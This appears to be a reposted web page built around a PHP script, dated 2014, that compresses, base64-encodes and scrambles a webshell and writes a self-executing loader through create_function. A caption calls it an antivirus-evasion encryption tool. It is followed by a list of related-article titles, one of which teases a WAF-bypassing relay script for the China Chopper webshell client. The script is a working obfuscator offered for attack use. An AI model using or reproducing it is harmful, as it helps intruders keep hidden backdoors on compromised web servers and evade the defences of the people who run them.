<?php

/****************************************

 *author: L.N.

 *blog  : [url]http://lanu.sinaapp.com[/url]

 *date  : 2014.01.03

*****************************************/

    $Key = "";

    $YourShell = file_get_contents("1.php");

    if($YourShell == null){

        echo "not find content!";

    }

    $En_Base64 = base64_encode(gzdeflate($YourShell));

    $Lm_File = fopen('lm.php',"a+");

    $Lm_YourShell = Encode($En_Base64,2, &$Key);

    $Lm_YourShell_Key = $Key;

    fwrite($Lm_File,"<?php \n/* code by L.N. [url]http://lanu.sinaapp.com[/url] */\n");

    fwrite($Lm_File,'$co ="'.$Lm_YourShell.'";'."\n");

    $Lm_Str_Replace = Encode('str_replace', 2, &$Key);

    $Lm_Str_Replace_Key = $Key;

    fwrite($Lm_File,'$sr = str_replace("'.$Lm_Str_Replace_Key.'","","'.$Lm_Str_Replace.'");'."\n");

    $Lm_Base64_Decode = Encode('base64_decode',2, &$Key);

    $Lm_Base64_Decode_Key = $Key;

    fwrite($Lm_File,'$bd = $sr("'.$Lm_Base64_Decode_Key.'","","'.$Lm_Base64_Decode.'");'."\n");

    $Lm_Gzinflate = Encode('gzinflate',2, &$Key);

    $Lm_Gzinflate_Key = $Key;

    fwrite($Lm_File,'$ge = $sr("'.$Lm_Gzinflate_Key.'","","'.$Lm_Gzinflate.'");'."\n");

    $Lm_Create_Cunction = Encode('create_function',2, &$Key);

    $Lm_Create_Cunction_Key = $Key;

    fwrite($Lm_File,'$cc = $sr("'.$Lm_Create_Cunction_Key.'","","'.$Lm_Create_Cunction.'");'."\n");

    fwrite($Lm_File,'$ex = $cc("",$ge($bd($sr("'.$Lm_YourShell_Key.'","",$co))));'."\n");

    fwrite($Lm_File,'$ex();'."\n");

    fwrite($Lm_File,'?>'."\n");

    fclose($Lm_File);

    function Encode($Str, $Key_Num, &$Key)

    {

        do{

            $Key = RandString($Key_Num);

        }while(strpos($Str, $Key) !== false);

        return InsertString($Str,$Key,$Key_Num);

    }

    function RandString($Num)

    {

        $Str = 'abcdefghijklmnopqrstuvwxyz';

        $Out_Str = "";

        for($i=0;$i<$Num;$i++)

        {

                $Rand = rand(0,25);

                $Out_Str .= $Str[$Rand];

        }

        return $Out_Str;

    }

    function InsertString($Str, $Key, $Key_Num)

    {

        $Str_Len = strlen($Str);

        if(intval($Str_Len/20) >= 5)

        {

            $Str_Rand_Num = 20;

        }

        elseif(intval($Str_Len/10) >= 5)

        {

            $Str_Rand_Num = 10;

        }

        elseif(intval($Str_Len/5) >= 5)

        {

            $Str_Rand_Num = 5;

        }

        else

        {

            $Str_Rand_Num = 2;

        }

        $Arr_Str = str_split($Str, $Str_Rand_Num);

        if($Key_Num > $Str_Rand_Num)

        {

            echo "Key_Num is not greater than Str_Rand_Num";exit;

        }

        for($i=1;$i<count($Arr_Str);$i++)

        {

            $Check_Str = $Arr_Str[$i-1] . $Key . $Arr_Str[$i];

            if(strpos($Check_Str,$Key)<strlen($Arr_Str[$i-1])||strpos(strrev($Check_Str),strrev($Key))<strlen($Arr_Str[$i]))

            {

                continue;

            }

            else

            {

                $Arr_Str[$i-1] .= $Key;

            }

        }

        $Out_Str = implode($Arr_Str);

        return $Out_Str;

    }

?>

一个PHP加密脚本,达到一定免杀效果的更多相关文章

  1. php中转菜刀脚本过狗免杀

    <?php $target="url";//shell 地址 菜刀连这个脚本做中转 $post=''; $i=0; foreach($_POST AS $K=>$V) ...

  2. 2017-2018-2 20155314《网络对抗技术》Exp3 免杀原理与实践

    2017-2018-2 20155314<网络对抗技术>Exp3 免杀原理与实践 目录 实验要求 实验环境 预备知识 实验步骤 1 免杀效果实测 1.1 恶意代码生成工具 1.2 免杀效果 ...

  3. 20165223《网络对抗技术》Exp3 免杀原理与实践

    目录 -- 免杀原理与实践 免杀原理与实践 本次实验任务 基础知识问答 免杀扫描引擎 实验内容 正确使用msf编码器,msfvenom生成jar等文件,veil-evasion,加壳工具,使用shel ...

  4. 2018-2019-2 网络对抗技术 20165328 Exp3 免杀原理与实践

    一.实验要求: . 实践内容(.5分) .5分),msfvenom生成如jar之类的其他文件(.5分),veil-evasion(.5分),加壳工具(.5分),使用shellcode编程(1分) .5 ...

  5. 2018-2019-2 网络对抗技术 20165323 Exp3 免杀原理与实践

    一.实践内容 1.1 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳工具,使用shellcode编程 1.2 通过组合应用各种技术实现恶意代码免杀 ( ...

  6. 20165214 2018-2019-2 《网络对抗技术》Exp3 免杀原理与实践 Week5

    <网络对抗技术>Exp3 免杀原理与实践 Week5 一.实验内容 1.正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳工具,使用shell ...

  7. 20164301 Exp3 免杀原理与实践

    Exp3 免杀原理与实践  1. 实践内容 1.1 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳工具,使用shellcode编程 1.2 通过组合应 ...

  8. 2018-2019-2 网络对抗技术 20165308 Exp3 免杀原理与实践

    2018-2019-2 网络对抗技术 20165308 Exp3 免杀原理与实践 实践内容(3.5分) 1.1 正确使用msf编码器(0.5分),msfvenom生成如jar之类的其他文件(0.5分) ...

  9. 【黑客免杀攻防】读书笔记2 - 免杀与特征码、其他免杀技术、PE进阶介绍

    第3章 免杀与特征码 这一章主要讲了一些操作过程.介绍了MyCCL脚本木马免杀的操作,对于定位特征码在FreeBuf也曾发表过类似工具. VirTest5.0特征码定位器 http://www.fre ...

随机推荐

  1. 【Linux/Ubuntu学习1】Linux /etc 目录详解

    /etc目录 包含很多文件.许多网络配置文件也在/etc 中. /etc/rc   or/etc/rc.d   or/etc/rc*.d   启动.或改变运行级时运行的scripts或scripts的 ...

  2. leetcode 题解 Add Two Numbers(两个单链表求和)

    题目: You are given two linked lists representing two non-negative numbers. The digits are stored in r ...

  3. 重构15-Remove Duplication(删除重复)

    这大概是处理一个方法在多处使用时最常见的重构.如果不加以注意的话,你会慢慢地养成重复的习惯.开发者常常由于懒惰或者在想要尽快生成尽可能多的代码时,向代码中添加很多重复的内容.我想也没必要过多解释了吧, ...

  4. css+div网页设计(三)--与多种技术的混合应用

    本篇博客将介绍css与多种技术的混合应用,javascript可以为我们的页面更加方便的交互,xml使数据存储跟方便,ajax的异步更新可以加快我们网页的载入速度. 1.css与javascript ...

  5. zend studio常见问题解答

    1.如何实现zend studio成为注册版请点击查看此链接http://www.geekso.com/ZendStudio100/ 2.如何将zend studio的默认GBK编码设置为其它编码,例 ...

  6. poj 1390 动态规划

    思路: 黑书的例题 #include<iostream> #include<cstring> #include<algorithm> #include<cma ...

  7. JDK 自带工具试用(一)

    简述: 运维监控会用到JDK的小工具 说明: 1. jps 用来查看当前运行的Java进程 我在eclipse中起了一个web 应用 或者用jps -l 可以查看的更清楚一点 jps -v 看到103 ...

  8. 浅析为什么char类型的范围是 —128~+127

    转载于daiyutage 在C语言中, signed char 类型的范围为-128~127,每本教科书上也这么写,但是没有哪一本书上(包括老师)也不会给你为什么是-128~127,这个问题貌似看起来 ...

  9. 【转】使用SharpZipLib实现zip压缩

    使用国外开源加压解压库ICSharpCode.SharpZipLib实现加压,该库的官方网站为 http://www.icsharpcode.net/OpenSource/SharpZipLib/Do ...

  10. php学习笔记5--php中的可变变量,可变函数及匿名函数

    可变变量指的是:将一个变量的值再次当做一个变量名从而得到另外一个变量的值.如:$name = 'dqrcsc';$myname = 'name'; //$myname的值碰巧是另一个变量的变量名ech ...